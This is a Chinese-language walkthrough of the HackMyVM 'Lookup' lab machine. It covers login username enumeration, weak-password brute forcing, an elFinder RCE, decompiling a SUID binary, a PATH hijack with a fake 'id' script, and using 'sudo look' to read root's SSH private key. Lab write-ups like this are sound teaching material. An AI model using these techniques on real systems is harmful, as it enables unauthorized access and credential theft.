Hackmyvm-Lookup - 安全员小周

0x00信息收集

0x01端口扫描

PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httpMAC Address: 08:00:27:0A:44:CF (Oracle VirtualBox virtual NIC)22/tcp open  ssh
OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)80/tcp open  http
Apache httpd 2.4.41 ((Ubuntu))|_http-title: Did not follow redirect to http://lookup.hmv|_http-server-header: Apache/2.4.41 (Ubuntu)

0x02目录扫描

login.php

0x10web

根据端口开放情况来看，只能根据web先来看，web页面访问是一个登陆界面。并且可以根据返回包可以来判断用户是否存在
用户存在

Wrong password. Please try again.  Redirecting in 3 seconds.

用户不存在

Wrong username or password. Please try again.  Redirecting in 3 seconds.

根据响应包特征先爆破出用户名，之后根据用户名爆破出密码。进行第一步的突破验证。

爆破出用户为admin 和jose，因此针对两个用户进行弱密码爆破
爆破可得

admin:password123jose:password123

0x11 get_shell

登陆之后可以查看界面，我们可以看到这是一个文件管理器。

找到了对应的版本，可以看到是elFinder的2.1.47版本，有对应的rce。直接利用nday拿到权限。

0x20 后渗透

针对于这一点其实我个人是觉得有点像ctf了。我们找到赋予了suid的一些命令。

find / -perm 04000  2>/dev/null

ls -al /usr/sbin/pwm-rwsr-sr-x 1 root root 17176 Jan 11  2024 /usr/sbin/pwm

看过wp才发现这是pwm文件有问题。直接利用meterpreter download 将pwm下载下来。

0x21pwm分析

运行程序

x64位程序使用ida反编译，拿到伪代码，分析一下。


int __fastcall main(
int argc, const char **argv, const char **envp){  char v4; // [rsp+Fh] [rbp-131h]  FILE *stream; // [rsp+10h] [rbp-130h]  FILE *v6; // [rsp+18h] [rbp-128h]  char v7[64]; // [rsp+20h] [rbp-120h] BYREF  char s[112]; // [rsp+60h] [rbp-E0h] BYREF  char filename[104]; // [rsp+D0h] [rbp-70h] BYREF  unsigned __int64 v10; // [rsp+138h] [rbp-8h]  v10 = __readfsqword(0x28u);  puts("[!] Running 'id' command to extract the username and user ID (UID)");  snprintf(s, 0x64uLL, "id");  stream = popen(s, "r");  
if ( stream )  {
if ( (unsigned int)__isoc99_fscanf(stream, "uid=%*u(%[^)])", v7) == 1 )
{
printf("[!] ID: %s\n", v7);
pclose(stream);
snprintf(filename, 0x64uLL, "/home/%s/.passwords", v7);
v6 = fopen(filename, "r");
if ( v6 )
{
while ( 1 )
{
v4 = fgetc(v6);
if ( v4 == -1 )
break;
putchar(v4);
}
fclose(v6);
return 0;
}
else
{
printf("[-] File /home/%s/.passwords not found\n", v7);
return 0;
}
}
else
{
perror("[-] Error reading username 
from id command\n");
return 1;
}  }  else  {
perror("[-] Error executing id command\n");
return 1;  }
}

首先运行id命令将id命令结果写入数组，之后进行读取，如果能读到内容。就进行下一步
下一步匹配uid=%*u(%[^)]) 对应的uid=后的内容将括号内的内容写入 V7
/home/%s/.passwords 读取对应v7的home文件夹下面的文件夹的内容

分析到这里其实我们已经发现，首先这个pwm文件是由suid权限的。并且对于/home只有think 一个用户，我们可能就是要利用id命令，送一个think字符串进去从而读取/home下的 think的password。

0x22伪造id

# 首先改变PATHPATH=/tmp:$PATHcd /tmpecho 'echo "uid=0(think)"' > idchmod +x id

此时再运行pwm文件可以看到我们已经拿到/home/think/.password的内容

0x23横向think用户

经过不懈的努力，我们终于拿到了think用户的密码候选，我们利用hydra进行爆破。

成功拿到对应的ssh的密码进行登陆。

ssh think@192.168.221.76

0x24权限提升

查询到sudo 权限有一个look可以为我们所用。但是此时可以看到/etc/passwd 和/etc/shadow 因为我们有root权限，所以可以根据root权限进行操作。但是事情总是不尽如人意，并没有爆出对应的root密码。之后想到如果我们能拿到root的ssh私钥，我们照样可以针对于root用户进行一个密钥验证。

LFILE=/root/.ssh/id_rsasudo look '' "$LFILE"

查看root下的 .ssh/id_rsa，拿到私钥

将内容保存在rsa文件中

chmod 600 rsa # 一般都需要设置成600  ssh root@ip -i rsa

0x30 总结

lookup这台机器算是hmv中难度中等的一个机器，主要还是通过突破验证到达指定文件系统。文件系统是易受攻击的系统。拿到服务器权限之后，这一点我确实认为pwm这个文件太像ctf了，分析之后利用id伪造拿到密码横向到think用户，最后是通过sudo 提权拿到root私钥成功获取权限。下机